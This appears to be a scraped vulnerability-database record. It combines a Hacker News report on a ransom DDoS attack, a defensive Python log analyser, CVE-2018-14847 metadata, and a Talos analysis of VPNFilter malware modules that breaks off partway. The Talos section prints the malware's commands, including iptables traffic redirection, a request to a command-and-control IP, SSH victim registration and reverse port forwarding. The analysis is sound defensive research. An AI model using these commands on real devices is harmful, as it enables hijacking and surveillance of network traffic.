Cybersecurity company Imperva on Friday said it recently mitigated a ransom distributed denial-of-service (DDoS) attack targeting an unnamed website that peaked at 2.5 million requests per second (RPS).
"While ransom DDoS attacks are not new, they appear to be evolving and becoming more interesting with time and with each new phase," Nelli Klepfish, security analyst at Imperva, [said](<https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/>). "For example, we've seen instances where the ransom note is included in the attack itself embedded into a URL request."
The top sources of the attacks came from Indonesia, followed by the U.S., China, Brazil, India, Colombia, Russia, Thailand, Mexico, and Argentina.
Distributed denial-of-service (DDoS) attacks are a subcategory of denial-of-service (DoS) attacks in which an army of connected online devices, known as a botnet, is used to overwhelm a target website with fake traffic in an attempt to render it unavailable to legitimate users.
The California-headquartered firm said that the affected entity received multiple ransom notes included as part of the DDoS attacks, demanding the company make a bitcoin payment to stay online and avoid losing "hundreds of millions in market cap."
In an interesting twist, the attackers are calling themselves REvil, the infamous ransomware-as-a-service cartel that [suffered a major setback](<https://thehackernews.com/2022/01/russia-arrests-revil-ransomware-gang.html>) after a number of its operators were arrested by Russian law enforcement authorities earlier this January.
"It is not clear however whether the threats were really made by the original REvil group or by an imposter," Klepfish noted.
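The two signals the report describes, a sudden burst in requests per second and an extortion note smuggled into the request URL, can both be pulled out of ordinary web server access logs. The following is an added example written for this article, not Imperva's or THN's code; the log lines are constructed in combined log format, and the RPS threshold and keyword list are assumptions chosen for the sample, not values from the report.

```python
"""Spot a request flood and ransom text carried in request URLs.

Added example, not code from Imperva or The Hacker News. The log lines
are constructed; the threshold and RANSOM_TERMS are assumptions.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

# Combined log format: ip ident user [ts] "METHOD uri PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed vocabulary of an extortion note embedded in a URL (lower case).
RANSOM_TERMS = ("bitcoin", "btc", "ransom", "wallet", "market cap", "pay")


def parse_line(line):
    """Parse one access log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], TS_FMT)
    return {
        "ip": m["ip"],
        "second": int(ts.timestamp()),       # bucket key: whole seconds
        "uri": unquote_plus(m["uri"]),       # decode %20 etc. before matching
        "status": int(m["status"]),
    }


def analyze(lines, rps_threshold):
    """Return per-second request counts, the seconds at or above the RPS
    threshold, the number of distinct source IPs, and any URIs that carry
    ransom-note vocabulary."""
    per_second = Counter()
    sources = defaultdict(set)
    ransom_uris = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        per_second[rec["second"]] += 1
        sources[rec["second"]].add(rec["ip"])
        lowered = rec["uri"].lower()
        if any(term in lowered for term in RANSOM_TERMS):
            ransom_uris.append(rec["uri"])
    flood_seconds = sorted(s for s, n in per_second.items() if n >= rps_threshold)
    all_sources = set().union(*sources.values()) if sources else set()
    return {
        "per_second": dict(per_second),
        "flood_seconds": flood_seconds,
        "distinct_sources": len(all_sources),
        "ransom_uris": ransom_uris,
    }


# Constructed sample: quiet traffic at 10:00:00 and 10:00:02 around a
# six-request burst at 10:00:01 from six sources, four of which carry the
# note in the path. Real floods are orders of magnitude larger; the
# threshold of 5 below only fits this toy sample.
NOTE_PATH = "/pay%20us%201%20bitcoin%20or%20lose%20market%20cap"
SAMPLE_LOG = [
    '203.0.113.10 - - [05/Mar/2022:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '198.51.100.7 - - [05/Mar/2022:10:00:00 +0000] "GET /products HTTP/1.1" 200 5120',
    f'192.0.2.1 - - [05/Mar/2022:10:00:01 +0000] "GET {NOTE_PATH} HTTP/1.1" 404 512',
    f'192.0.2.2 - - [05/Mar/2022:10:00:01 +0000] "GET {NOTE_PATH} HTTP/1.1" 404 512',
    '192.0.2.3 - - [05/Mar/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 1024',
    f'192.0.2.4 - - [05/Mar/2022:10:00:01 +0000] "GET {NOTE_PATH} HTTP/1.1" 404 512',
    '192.0.2.5 - - [05/Mar/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 1024',
    f'192.0.2.6 - - [05/Mar/2022:10:00:01 +0000] "GET {NOTE_PATH} HTTP/1.1" 404 512',
    '203.0.113.10 - - [05/Mar/2022:10:00:02 +0000] "GET /about HTTP/1.1" 200 2048',
    'not a log line',
]


def sample_report(rps_threshold=5):
    """Run the analysis over the constructed sample."""
    return analyze(SAMPLE_LOG, rps_threshold)


if __name__ == "__main__":
    r = sample_report()
    print("flood seconds:", r["flood_seconds"])
    print("distinct sources:", r["distinct_sources"])
    print("ransom-note URIs:", len(r["ransom_uris"]))
```

In practice the threshold is derived from a baseline of the site's own peak RPS, and the URI check is a triage aid for the analyst rather than a blocking rule, since the flood itself is what needs mitigating.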
Figure: Attack origins
The 2.5 million RPS attack is said to have lasted less than a minute, while one of the sister sites operated by the same company sustained a similar attack that lasted approximately 10 minutes, with the tactics employed constantly changed in an attempt to evade mitigation.
Evidence gathered by Imperva points to the DDoS attacks originating from the [Mēris botnet](<https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html>), which has continued to leverage a now-addressed security vulnerability in Mikrotik routers ([CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>)) to strike targets, including Yandex last September.
"The types of sites the threat actors are after appear to be business sites focusing on sales and communications," Klepfish said. "Targets tend to be U.S.- or Europe-based with the one thing they all have in common being that they are all exchange-listed companies and the threat actors use this to their advantage by referring to the potential damage a DDoS attack could do to the company stock price."
The findings come as malicious actors have been spotted weaponizing a new amplification technique called [TCP Middlebox Reflection](<https://thehackernews.com/2022/03/hackers-begin-weaponizing-tcp-middlebox.html>) for the very first time in the wild to hit banking, travel, gaming, media, and web hosting industries with a flood of fake traffic.
The ransom DDoS attack is also the second botnet-related activity averted by Imperva since the start of the year, the company having detailed in late January a web scraping attack that targeted an unidentified job listing platform.
"The attacker used a large-scale botnet, generating no less than 400 million bot requests from nearly 400,000 unique IP addresses over four days with the intent of harvesting job seekers' profiles," the security firm [said](<https://www.imperva.com/blog/imperva-mitigates-massive-bot-attack-of-400-million-requests/>).
Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.
{"id": "THN:0400E1C8B9BC8C15BAB8DE5F208A24BB", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Imperva Thwarts 2.5 Million RPS Ransom DDoS Extortion Attacks", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi461o-PUBEkGZMGabqSSoQD2B0HPpg9tATO2wonj81xGqlUFGjVbo1CpPG_pMgT8nKKSlY0K-ZTuIXRZUPbOZQ70CB5BSF-HjAXFY043bN-D1mpIGEdqD4SlgZs2LQQkuIxuzWn5hiYIhzm4GBvtbmZMnSkZ1C-R4cQL7YZ4P_ETLzNXfZsjwRYmzW>)\n\nCybersecurity company Imperva on Friday said it recently mitigated a ransom distributed denial-of-service (DDoS) attack targeting an unnamed website that peaked at 2.5 million requests per second (RPS).\n\n\"While ransom DDoS attacks are not new, they appear to be evolving and becoming more interesting with time and with each new phase,\" Nelli Klepfish, security analyst at Imperva, [said](<https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/>). \"For example, we've seen instances where the ransom note is included in the attack itself embedded into a URL request.\"\n\nThe top sources of the attacks came from Indonesia, followed by the U.S., China, Brazil, India, Colombia, Russia, Thailand, Mexico, and Argentina.\n\nDistributed denial-of-service (DDoS) attacks are a subcategory of denial-of-service (DoS) attacks in which an army of connected online devices, known as a botnet, is used to overwhelm a target website with fake traffic in an attempt to render it unavailable to legitimate users.\n\nThe California-headquartered firm said that the affected entity received multiple ransom notes included as part of the DDoS attacks, demanding the company make a bitcoin payment to stay online and avoid losing \"hundreds of millions in market cap.\"\n\nIn an interesting twist, the attackers are calling themselves REvil, the infamous ransomware-as-a-service cartel that [suffered a major setback](<https://thehackernews.com/2022/01/russia-arrests-revil-ransomware-gang.html>) after a number of 
its operators were arrested by Russian law enforcement authorities earlier this January.\n\n\"It is not clear however whether the threats were really made by the original REvil group or by an imposter,\" Klepfish noted.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEj8toAElA1nFCf025htdOH8TwAvciuIz4ZS03MEWRgUxD37zdA_P9ILUSPopxSXx1TSHGfxGjYbslfMvIHiitsTUmpLAI3cRB715xxp9p-iOsXPHxx89Vos-N1CfU_OVIdrt8RCs4cF_T4ELs9mmdBwwIMTzoCzWlP2xanxACAYXEni8yy87xlBkay_>) \n--- \nAttack origins \n \nThe 2.5 million RPS attack is said to have lasted less than a minute, with one of the sister sites operated by the same company sustaining a similar attack that lasted approximately 10 minutes, even as the tactics employed were constantly changed to avert possible mitigation.\n\nEvidence gathered by Imperva points to the DDoS attacks originating from the [M\u0113ris botnet](<https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html>), which has continued to leverage a now-addressed security vulnerability in Mikrotik routers ([CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>)) to strike targets, including Yandex last September.\n\n\"The types of sites the threat actors are after appear to be business sites focusing on sales and communications,\" Klepfish said. 
\"Targets tend to be U.S.- or Europe-based with the one thing they all have in common being that they are all exchange-listed companies and the threat actors use this to their advantage by referring to the potential damage a DDoS attack could do to the company stock price.\"\n\nThe findings come as malicious actors have been spotted weaponizing a new amplification technique called [TCP Middlebox Reflection](<https://thehackernews.com/2022/03/hackers-begin-weaponizing-tcp-middlebox.html>) for the very first time in the wild to hit banking, travel, gaming, media, and web hosting industries with a flood of fake traffic.\n\nThe ransom DDoS attack is also the second botnet-related activity averted by Imperva since the start of the year, what with the company detailing a web scraping attack that targeted an unidentified job listing platform in late January.\n\n\"The attacker used a large-scale botnet, generating no less than 400 million bot requests from nearly 400,000 unique IP addresses over four days with the intent of harvesting job seekers' profiles,\" the security firm [said](<https://www.imperva.com/blog/imperva-mitigates-massive-bot-attack-of-400-million-requests/>).\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2022-03-05T07:53:00", "modified": "2022-03-06T06:47:13", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 6.4}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "href": "https://thehackernews.com/2022/03/imperva-thwarts-25-million-rps-ransom.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2018-14847"], "immutableFields": [], "lastseen": "2022-05-09T12:37:29", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:39C8F377-0B4E-42DB-9730-672DE9671C8C"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0830"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8"]}, {"type": "cve", "idList": ["CVE-2018-14847"]}, {"type": "exploitdb", "idList": ["EDB-ID:45209", "EDB-ID:45578"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:34440D2AB17F925EB3B4582B358E548F", 
"EXPLOITPACK:71B40F77201BD20B165A2CC309F0C281"]}, {"type": "hackread", "idList": ["HACKREAD:38EFBBF180E0993C3CC665D79BC0B551"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:941443220F7C778862BC45A189850EF6", "IMPERVABLOG:C35627F2B3AFD564AE9A15BFC7474967"]}, {"type": "kitploit", "idList": ["KITPLOIT:5494076556436489947"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1437FF0825AD10F9D61ABFE429326967"]}, {"type": "mmpc", "idList": ["MMPC:B4569A8CBDA7CA5A51F286861830C71B"]}, {"type": "mssecure", "idList": ["MSSECURE:B4569A8CBDA7CA5A51F286861830C71B"]}, {"type": "nessus", "idList": ["MIKROTIK_CVE_2018-14847.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310141279", "OPENVAS:1361412562310813155"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148958", "PACKETSTORM:149742"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B6B5A95341EBF4792BAD1B887E8F35DC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:744C774279644C0E2B83FB09F7352468"]}, {"type": "thn", "idList": ["THN:15F5633BC0BA0C82579744CCACA99558", "THN:31DAF3FB72A6AB73A54307C968C6570C", "THN:359CE3E905570B30722F914C18196DEB", "THN:B6838707858897EC6614B5E5C61FDE23", "THN:C96E59A0B083B41A78F431F292E7E1D5", "THN:EF8F680E8C0B204C481C9D7B5974A0A7"]}, {"type": "threatpost", "idList": ["THREATPOST:29B457A3AC4B513C7DA2C181E899EBBF", "THREATPOST:2E5940B4290E375F15EAA2246BBD6EFF", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:89FA3268B259F5D59A0211160BD3B700", "THREATPOST:AEFF18A46C45DA195E53C21BB6714562", "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C"]}, {"type": "zdt", "idList": ["1337DAY-ID-31296"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "mmpc", "idList": ["MMPC:B4569A8CBDA7CA5A51F286861830C71B"]}, {"type": "mssecure", "idList": ["MSSECURE:B4569A8CBDA7CA5A51F286861830C71B"]}, {"type": "threatpost", "idList": ["THREATPOST:E7D70D8CBF2F64521691B2DF2726498C"]}]}, "epss": [{"cve": "CVE-2018-14847", "epss": "0.974760000", "percentile": 
"0.999350000", "modified": "2023-03-17"}], "vulnersScore": 0.8}, "_state": {"dependencies": 1660004461, "score": 1684013406, "epss": 1679179052}, "_internal": {"score_hash": "a8e767444c9c01b8d60dd0b1576a4dd2"}}
{"attackerkb": [{"lastseen": "2023-07-15T20:25:44", "description": "MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-08-02T00:00:00", "type": "attackerkb", "title": "CVE-2018-14847", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2020-06-05T00:00:00", "id": "AKB:39C8F377-0B4E-42DB-9730-672DE9671C8C", "href": "https://attackerkb.com/topics/oOoUGd0y46/cve-2018-14847", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "talosblog": [{"lastseen": "2018-10-05T08:22:15", "description": "## [](<http://4.bp.blogspot.com/-C9g9rcZel60/W6u9GJlOXgI/AAAAAAAAEEw/hYZ9vT-4Vhw5kPbPc21U12yoVRyRQIgTwCK4BGAYYCw/s1600/2018-09-26.jpg>)\n\n## Summary\n\n \nVPNFilter \u2014 [a multi-stage, modular 
framework](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) that has infected hundreds of thousands of network devices across the globe \u2014 is now known to possess even greater capabilities. Cisco Talos recently discovered seven additional third-stage VPNFilter modules that add significant functionality to the malware, including an expanded ability to exploit endpoint devices from footholds on compromised network devices. The new functions also include data filtering and multiple encrypted tunneling capabilities to mask command and control (C2) and data exfiltration traffic. And while we believe our work, and the work of our international coalition of partners, has mostly neutralized the threat from VPNFilter, it can still be difficult to detect in the wild if any devices remain unpatched. \n \nTalos has been researching VPNFilter for months. Our initial findings are outlined [here](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), and a description of additional modules used by the framework is [here](<https://blog.talosintelligence.com/2018/06/vpnfilter-update.html>). As part of our continued investigation, we developed a technique to examine a key protocol used by MikroTik networking devices to hunt for possible exploitation methods used by the actor. \n \nAs we followed the thread of VPNFilter infections, it became clear that MikroTik network devices were heavily targeted by the threat actor, especially in Ukraine. Since these devices seemed to be critical to the actor's operational goals, this led us to try to understand how they were being exploited. Part of our investigation included the study of the protocol used by MikroTik's Winbox administration utility. In this blog, we'll share how and why we studied this protocol, as well as the decoder tool we developed as a way of helping the security community look into this protocol for potential malicious actor activity. 
\n \nThe sophistication of VPNFilter drives home the point that this is a framework that all individuals and organizations should be tracking. Only an advanced and organized defense can combat these kinds of threats, and at the scale that VPNFilter is at, we cannot afford to overlook these new discoveries. \n \n \n\n\n## Expanded VPNFilter capabilities\n\n \nThe discovery of these additional VPNFilter third-stage modules has significantly added to our understanding of what we already knew to be an extremely potent threat. Together, these modules added: \n\n\n 1. Additional capabilities that could be leveraged to map networks and exploit endpoint systems that are connected to devices compromised by VPNFilter.\n 2. Multiple ways for the threat actor to obfuscate and/or encrypt malicious traffic, including communications used for C2 and data exfiltration.\n 3. Multiple tools that could be utilized to identify additional victims accessible from the actor's foothold on devices compromised by VPNFilter for both lateral movement within a network, as well as to identify new edge devices in other networks of interest to the actor.\n 4. The capacity to build a distributed network of proxies that could be leveraged in future unrelated attacks to provide a means of obfuscating the true source of attack traffic by making it appear as if the attacks originated from devices previously compromised by VPNFilter.\n \nWe were able to confirm the existence and capabilities of the malware after reverse-engineering these additional modules. Previously, we had to make analytic assessments on the existence and nature of these capabilities based solely on telemetry analysis, which always leaves room for error. \n \nFor example, we had previously noted what appeared to be devices compromised by VPNFilter conducting scans of large IP spaces that seemed focused on identifying other devices vulnerable to the methods of exploitation used by the actor associated with the VPNFilter malware. 
However, now we can discuss the specific third-stage module used for this activity. \n \nAs a result of our continued research, we have furthered our understanding of the full scope of the capabilities associated with VPNFilter after examining these additional third-stage modules. \n \n\n\n## Additional third-stage modules\n\n \nAs previously described, Talos identified the following seven additional third-stage modules that greatly expanded the capabilities present within VPNFilter. \n\n\n[](<https://4.bp.blogspot.com/-JdUaMCSMsJQ/W6uNrIDX3pI/AAAAAAAAAzA/U9yY81ZWztsh6ZyYItWhh_Tdj47kCloUgCLcBGAs/s1600/image4.png>)\n\nEach of these modules is described in detail in the following sections. \n \n\n\n### 'htpx' (endpoint exploitation module - executable injection)\n\n \n'htpx' is a third-stage module for VPNFilter. This module shares similar code with the 'ssler' module previously [documented](<https://blog.talosintelligence.com/2018/06/vpnfilter-update.html>) by Talos. The module relies heavily on open-source code that can be traced to the original projects based on strings present within the binary. A good example is '[libiptc.c](<https://git.netfilter.org/iptables/tree/libiptc/libiptc.c>)', which is part of Netfilter. \n\n\n[](<https://4.bp.blogspot.com/-QLSEAngfixo/W6uNxGUY_FI/AAAAAAAAAzE/Y5OL6cV6FVw1N0PBsY8LFKbdzWHagi_AQCLcBGAs/s1600/image3.jpg>)\n\n**Comparison of strings between 'htpx' (left) and 'ssler' (right). **\n\n \nThe primary function present within the 'htpx' module is responsible for setting up iptables rules to forward network traffic destined for TCP port 80 to a local server running on port 8888. This redirection is accomplished by first loading kernel modules that allow for traffic management. These modules (Ip_tables.ko, Iptable_filter.ko, and Iptable_nat.ko) are loaded with the insmod shell command. 
\n \nThe 'htpx' module then issues the following commands to surreptitiously forward traffic: \n \niptables -I INPUT -p tcp --dport 8888 -j ACCEPT \niptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8888 \n \nIt also periodically checks to ensure that these rules remain present by issuing similar delete commands then re-adding them. A temp file is also created called /var/run/htpx.pid. \n \nThe following HTTP request is then generated: \n \nGET %s HTTP/1.1\\r\\nHost: 103.6.146.194\\r\\nAccept: */*\\r\\nUser-Agent: curl53\\r\\n\\r\\n \n \nDuring our analysis of the 'htpx' module, we were unable to elicit a response from C2 infrastructure, so we were unable to observe additional module operations. During our analysis of the module binary, we identified that the module inspects HTTP communications to identify the presence of Windows executables. When they are encountered, the executable is flagged and added to a table. We assess with moderate confidence that this module could be leveraged by attackers to download a binary payload and allow for on-the-fly patching of Windows executables as they pass through compromised devices. \n \n\n\n### 'ndbr' (multi-functional SSH tool)\n\n \nThe 'ndbr' module is a module with SSH capabilities that also has the ability to port-scan other IPs. This module uses the dropbear SSH server and client and is a modified version of the [dbmulti](<https://github.com/mkj/dropbear/blob/master/dbmulti.c>) utility version 2017.75. We have identified several modifications to the standard dropbear functionality. \n \nThe first modifications are to the dbmulti utility itself. The typical utility can function as an SSH client, SSH server, perform data transfers using SCP, generate keys, or convert keys. The functionality is determined either by the program name or the first parameter passed to the program. 
The 'ndbr' module has replaced the ability to generate or convert keys with a network mapping (i.e., port-scanning) function as well as another function called 'ndbr.' \n \nLike the original \"dbmulti\" utility, the 'ndbr' module's functionality depends either on the name of the program or the first argument passed to the program. The arguments that the 'ndbr' module accepts are dropbear, dbclient, ssh, scp, ndbr, and nmap. A description of each of these arguments can be found in the following sections. \n \n\n\n#### dropbear\n\n \nThe dropbear command instructs the 'ndbr' module to operate as an SSH server. The original dropbear code uses the default SSH port (TCP/22) to listen for connections. However, the code present within the 'ndbr' module has been modified to use a default port of TCP/63914. Other modifications to the original dropbear code change the way that host keyfiles are handled. The default keyfile path has been changed to /db_key, but the 'ndbr' module does not drop this file. Instead, the buf_readfile dropbear function has been modified to load the proper key from memory when the filename parameter is equal to /db_key. \n \nInstead of using password-based authentication, the dropbear server has been modified to authenticate via a proper public key, which is also embedded in the 'ndbr' executable. A bug in this modified code mishandles connections attempting to use an incorrect public key. These authentication failures cause the ndbr SSH server to become stuck in an infinite loop. There is no indication to the client, however, that the authentication has failed. At this time, we have been unable to identify a correct key that would allow for successful authentication with the ndbr SSH server \u2014 neither of the keys embedded in the 'ndbr' module (i.e., /db_key and /cli_key) were correct, and no corresponding keys were found in any other VPNFilter-related binaries. 
\n \n\n\n#### dbclient (ssh)\n\n \nIf passed the dbclient or ssh parameter, the 'ndbr' module acts as the standard dropbear SSH command-line interface client but with modifications to its default options. As with the default keyfile with dropbear server command, the dbclient/ssh commands have a default identity file: /cli_key. At this time, we do not know what the dbclient (SSH client) is expected to connect to. \n \n\n\n#### nmap\n\n \nIf passed the nmap argument, the 'ndbr' module will perform a port scan of an IP or range of IPs. \n \nThe usage is: \n \nUsage %s -ip* <ip-addr: 192.168.0.1/ip-range 192.168.0.0./24> -p* <port: 80/port-range: 25-125> -noping <default yes> -tcp <default syn> -s <source ip> -h/--help (print this help) \n \n\n\n#### ndbr\n\n \nIf passed the ndbr argument, the 'ndbr' module will do one of three operations based on the other parameters it is passed. The SSH commands will make use of the default keys (i.e., /db_key and /cli_key) as described above. \n \nThe third parameter must begin with the word \"start,\" or the 'ndbr' module uninstalls itself. \n \nIf the ndbr module is executed using the following parameters: \n \n$ ./ndbr_<arch> ndbr <param1> <param2> \"start proxy <host> <port>\" \n \nThe following dropbear SSH command will be executed: \n \nssh -y -p <port> prx@<host> srv_ping j(<B64 victim host name>)_<victim MAC address> <param2> \n \nThis causes the dropbear SSH client to connect to a remote host and issue the \"srv_ping\" command, which is likely used to register the victim with a C2 server. 
\n \nIf the ndbr module is executed using the following parameters: \n \n`$ ./ndbr_<arch> ndbr <param1> <param2> \"start -l <port>\"` \n \nThe dropbear SSH server (as described above) is started and begins listening on the port specified: \n \n`sshd -p <port>` \n \nIf the ndbr module is executed with the following parameters: \n \n`$ ./ndbr_<arch> ndbr <param1> <param2> \"start <user> <host> <port>\"` \n \nRemote port forwarding is set up by executing the following dropbear command (see above for explanation of the command options): \n \n`ssh -N -T -y -p <port> -R :127.0.0.1:63914 <user>@<host>` \n \n\n\n### 'nm' (network mapper)\n\n \nThe 'nm' module is used to scan and map the local subnet. It iterates through all interfaces and starts by ARP scanning for all hosts on the subnet associated with each IP assigned to the interface. Once an ARP reply is received, nm will send an ICMP echo request to the discovered host. If an ICMP echo reply is received it will continue mapping by performing a port scan, trying to connect to the following remote TCP ports on the host: 9, 21, 22, 23, 25, 37, 42, 43, 53, 69, 70, 79, 80, 88, 103, 110, 115, 118, 123, 137, 138, 139, 143, 150, 156, 161, 190, 197, 389, 443, 445, 515, 546, 547, 569, 3306, 8080 or 8291. \n \nNext, it uses the MikroTik Network Discovery Protocol (MNDP) to locate any other MikroTik devices on the local network. If a MikroTik device replies to the MNDP ping, nm extracts the MAC address, system identity, version number, platform type, uptime in seconds, RouterOS software ID, RouterBoard model, and interface name from the discovered device. \n \nThe nm module looks in /proc/net/arp to get information about the infected device's ARP table, revealing the IP and MAC addresses of neighboring devices. Next, the entire contents of /proc/net/wireless are gathered. 
\n \nThe module performs a traceroute by first creating a TCP connection to 8.8.8.8:53 to confirm its availability (no data is sent), then ICMP echo requests are repeatedly sent to this IP with increasing TTLs. \n \nAll of the network information that is gathered is saved to a temporary file named /var/run/repsc_<time stamp>.bin. An example .bin file is as follows: \n\n\n[](<https://1.bp.blogspot.com/-C_k_GyYjAu4/W6uPw75omrI/AAAAAAAAAzc/Cq5CgWKzNEkRlRF1RdHzV2AqpKe45cVlQCLcBGAs/s1600/00001.jpg>)\n\nThe code responsible for the SSDP, CDP and LLDP functions was present within the module but was never called in the samples analyzed and therefore will always be empty. \n \nThe nm module requires three command line arguments to operate properly, but only the first parameter is used. Like several other modules, the first parameter is a folder, and this is the location where the data is permanently saved. The final task performed by the nm module is the moving of the temporary .bin file containing the results of the scan to a folder specified as the first command line argument, ostensibly for later exfiltration by the main VPNFilter process. \n \n\n\n### 'netfilter' (denial-of-service utility)\n\n \nnetfilter expects three arguments to be given on the command line. The first two arguments are unused, and the third argument is a quoted string in the format \"<block/unblock> <# of minutes>.\" '# of minutes' is how long netfilter should execute for before exiting. If 'block' was used as the first part of the third argument, netfilter adds the following rule to iptables: \n \nChain FORWARD (policy ACCEPT) \ntarget prot opt source destination \nDROP tcp -- anywhere anywhere tcpflags: PSH/PSH \n \nAfter adding this rule, netfilter waits 30 seconds and then deletes this rule. If there is still time remaining based on the '# of minutes' value, this process begins again. The addition and deletion loop ensures that the rule persists in the event the rule is deleted from the device. 
\n \nOnce the number of minutes has elapsed, the program exits. Signal handlers are also installed at the beginning of the netfilter program that deletes the iptables rule and then exit if the program receives either a SIGINT or SIGTERM. This is done so the device works as normal in the event someone manually terminates the netfilter program. \n \nFinally, the 'unblock' argument can be used to delete the iptables rule that was previously added using the 'block' argument. \n \nAlthough there are no other code paths possible, there are indications that there is or could have been something more to this module. \n \nThe first indicator is that all of the different netfilter module samples that Talos analyzed (MIPS, PPC, Tile-GX) contain the same list of 168 CIDR IP addresses and ranges which tie to the following companies/services: \n \n31.13.64.51 - WhatsApp \n169.44.36.0/25 - WhatsApp \n203.205.167.0/24 - Tencent (Owner of QQ Chat) \n52.0.0.0/16 - Amazon.com, Inc. (The following encrypted applications have used multiple IPs in this range: Wikr, Signal, Dust and Confide) \n \nThis indicates that the netfilter module may have been designed to deny access to specific forms of encrypted applications, possibly in an attempt to herd victim communications to a service that the actor preferred they use. Interestingly, Telegram, an extremely popular encrypted chat application, is missing from the list. \n \nHowever, we were unable to find any references to these strings in the code. All versions of netfilter that we have samples for have this same IP range list but do not appear to use it. It's possible that the samples we have are incomplete. \n \nThe iptables rule that is added by the netfilter module drops TCP packets with the PUSH flag set. This rule would likely use iptables rules that block all packets not just TCP packets with the PUSH flag set if its purpose is to provide attackers with the ability to launch denial-of-service attacks using compromised devices. 
